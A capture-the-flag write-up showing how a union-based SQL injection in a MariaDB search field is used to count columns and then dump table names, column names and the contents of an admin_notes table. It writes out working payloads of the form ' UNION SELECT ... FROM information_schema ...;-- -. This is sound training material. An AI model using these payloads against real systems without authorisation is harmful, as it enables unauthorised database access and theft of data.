Infinity - SQL Injection - Broken Search

Infinity — SQL Injection: Broken Search

Overview

A web application exposes a search feature that passes user input directly into a SQL query without sanitization. The goal is to exploit this using Union-based SQL Injection to enumerate the database and dump sensitive data.

Vulnerability: Union-based SQL Injection
Parameter: POST body — search field
Database: MariaDB (MySQL)

---

Step 1: Identify the Input Field

Open the challenge and locate the search input field.

---

Step 2: Test for SQL Injection

Inject a single quote ' to break the SQL syntax. The application returns a MariaDB error — confirming the input is unsanitized and the backend is MySQL-compatible.

---

Step 3: Determine Number of Columns

Use UNION SELECT to find how many columns the original query returns. Increment until no error appears.

1 column → Error: The used SELECT statements have a different number of columns

2 columns → Still errors

3 columns → Success. Numbers 2 and 3 are reflected in the response, confirming injectable positions.

---

Step 4: Enumerate the Database

With 3 columns confirmed, extract table names from information_schema.

' UNION SELECT 1,table_name,3 FROM information_schema.tables;-- -

Found a table: admin_notes

---

Step 5: Dump Column Names

' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='admin_notes';-- -

Columns found: id, note

---

Step 6: Dump the Data

' UNION SELECT 1,note,3 FROM admin_notes;-- -

Successfully retrieved the contents of admin_notes.

---

Key Takeaways

• Always test with ' and " — different databases react differently to each.
• Column count detection is the first real step in any UNION-based attack; don’t skip it.
• Reflected column positions tell you exactly where your output will appear — target those.
• information_schema is your map — tables first, then columns, then data.

---

Happy Hacking!

Follow me: LinkedIn · X